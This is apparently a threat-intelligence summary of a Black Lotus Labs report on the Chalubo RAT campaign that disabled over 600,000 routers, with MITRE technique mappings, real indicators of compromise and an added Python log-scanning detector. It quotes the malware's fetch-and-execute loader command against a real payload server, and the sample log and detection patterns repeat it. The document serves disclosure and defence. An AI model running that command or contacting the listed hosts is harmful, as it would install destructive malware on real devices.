Black Lotus Labs documented a destructive campaign that took offline more than 600,000 SOHO/IoT routers at a single ISP using Chalubo, a commodity RAT, delivered via a firmware-like update. The operation leveraged multi-stage loaders, Lua scripting, and ChaCha20-encrypted C2 communications to target Sagemcom and ActionTec modems within one ASN. #Chalubo #BlackLotusLabs #Sagemcom #ActionTec

Key points

  • Destructive campaign: over 600k SOHO/IoT routers were rendered inoperable within a 72-hour window (Oct 25–27, 2023) and required hardware replacement.
  • Primary payload: Chalubo, a commodity remote access trojan, identified as the driver behind the outage, capable of in-memory execution and encrypted C2 communications.
  • Infection chain: multi-stage loader with first-stage bash script (get_scrpc) downloaded from payload servers, followed by additional stages and payloads.
  • Loader behavior: uses Bash scripts, checks for binaries (usb2rci), configures iptables, and orchestrates retrieval and execution of the Chalubo agent; includes a 30-minute delay to evade sandbox detection.
  • Malware capabilities: Lua script execution for commands, ChaCha20-based C2 encryption, and hardcoded C2 lists with per-architecture payloads; potential DDoS-related functionality.
  • Global telemetry: Chalubo activity extended into Nov 2023–early 2024 with hundreds of thousands of IPs contacting C2s; majority of bots connected to a single panel, suggesting attribution obfuscation.
  • Scope and impact: attack appears engineered to disrupt service (firmware-level compromise) rather than maximize data theft; limited to a specific ASN, affecting two modem models.

MITRE Techniques

  • [T1059.008] Lua – The malware runs Lua scripts and uses Lua to retrieve additional payloads from C2s. Quote: “the operators behind this bot could execute any Lua script sent to the bot.”
  • [T1027] Obfuscated/Compressed Files and Information – The threat “removed all files from disk to run in-memory” and used obfuscation tradecraft. Quote: “employed savvy tradecraft to obfuscate its activity; it removed all files from disk to run in-memory.”
  • [T1036] Masquerading – The malware renames the process to hamper detection. Quote: “Renaming the process once run on the impacted system to hamper detection.”
  • [T1059.004] Unix Shell – Initial loader uses Unix shell commands to fetch and execute scripts. Quote: “curl http://104.233.210[.]119:51248/get_scrpc | /bin/sh”.
  • [T1105] Ingress Tool Transfer – The first-stage payload is retrieved from a payload server (get_scrpc) as the first step in infection. Quote: “Once exploited, devices reach out to a first stage payload server and retrieve the ‘get_scrpc’ bash script, the first step in the infection process.”
  • [T1573.001] Encrypted Channel – C2 communications are ChaCha20-encrypted with a hardcoded key/nonce. Quote: “downloads and decrypts the second stage using ChaCha20 with a hardcoded key and nonce.”
  • [T1082] System Information Discovery – The malware collects host-based information (MAC, device ID/type/version, local IP). Quote: “the malware ran, it attempted to retrieve host-based information such as the MAC address, device ID, device type, device version and the local IP.”
  • [T1071.001] Web Protocols – C2 communications occur over HTTP(S); the C2 infrastructure is reached through domain- and IP-based HTTP requests. (The article references the C2 domain/IP and HTTP-based communication rather than giving a single quotable line.)
  • [T1070.004] File Deletion – The binary deletes itself after execution to hinder analysis. Quote: “deletes itself from disk.”
  • [T1057] Process Creation – The loader forks, renames, and uses PR_SET_NAME to mask the running process and avoid detection. Quote: “the process name to a random creation of the same length as the original process name by using prctl PR_SET_NAME.”

Indicators of Compromise

  • [Domain] C2 and payload delivery domain – coreconfig.net8080/E2XRIEGSOAPU3Z5Q8
  • [IP Address] 185.189.240.13 – hardcoded fallback C2/command domain
  • [IP Address] 104.233.210.119 – payload server/C2 host
  • [URL] http://104.233.210.119:51248/get_scrpc – first-stage script delivery
  • [File] /usr/bin/usb2rci – binary checked by the loader
  • [File] /tmp/file.lck and /tmp/crrs – second-stage artifacts written to disk
  • [URL] coreconfig[.]net8080/E2XRIEGSOAPU3Z5Q8 – (alternate representation of domain) used in C2 communications
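As an added example, not code from the Black Lotus Labs report, the following Python scanner turns the indicators and technique mappings above into a simple log-line detector. The log lines, the log format and the tagging of each indicator are constructed for illustration; the regexes tolerate the "[.]" defanging used in the report.

```python
import re
from typing import Dict, List

# Indicator patterns from the report summary above, each tagged with the MITRE
# technique the summary associates with it (tagging is our assumption, not the report's).
INDICATORS = [
    (r"104\.233\.210(\[\.\]|\.)119", "payload server / C2 host 104.233.210.119", "T1105"),
    (r"185\.189\.240(\[\.\]|\.)13", "hardcoded fallback C2 185.189.240.13", "T1071.001"),
    (r"coreconfig(\[\.\]|\.)net", "C2 domain coreconfig.net", "T1071.001"),
    (r"/get_scrpc\b", "first-stage loader script get_scrpc", "T1105"),
    (r"\bcurl\b[^|]*\|\s*(/bin/)?sh\b", "curl output piped into a shell", "T1059.004"),
    (r"/tmp/(file\.lck|crrs)\b", "second-stage artifact written to /tmp", "T1105"),
    (r"/usr/bin/usb2rci\b", "loader probe for the usb2rci binary", "T1059.004"),
    (r"\bprctl\b.*PR_SET_NAME", "process renamed via prctl(PR_SET_NAME)", "T1036"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), desc, tid) for p, desc, tid in INDICATORS]


def scan_line(line: str) -> List[Dict[str, str]]:
    """Return one finding per indicator that matches this log line."""
    return [{"technique": tid, "indicator": desc, "line": line.strip()}
            for rx, desc, tid in COMPILED if rx.search(line)]


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Scan a sequence of log lines and collect every finding."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        findings.extend(scan_line(line))
    return findings


# Constructed sample log lines (not real telemetry). The 30-minute gap between the
# first and third lines mimics the sandbox-evasion delay described in the summary.
SAMPLE_LOG = [
    "Oct 25 03:14:07 router sh[412]: exec: curl http://104.233.210[.]119:51248/get_scrpc | /bin/sh",
    "Oct 25 03:14:09 router kernel: iptables: rule added by pid 417",
    "Oct 25 03:44:11 router sh[417]: test -x /usr/bin/usb2rci",
    "Oct 25 03:44:12 router sh[417]: write /tmp/file.lck",
    "Oct 25 03:44:13 router agent[433]: prctl PR_SET_NAME",
    "Oct 25 03:44:20 router net: connect coreconfig[.]net from 192.168.1.1",
    "Oct 25 03:50:00 router cron[99]: /usr/sbin/logrotate",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['technique']}] {f['indicator']}: {f['line']}")
```

The iptables line is deliberately left unmatched: iptables changes are routine on a router, so on their own they are context for a triage rather than an indicator.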

Read more: https://blog.lumen.com/the-pumpkin-eclipse/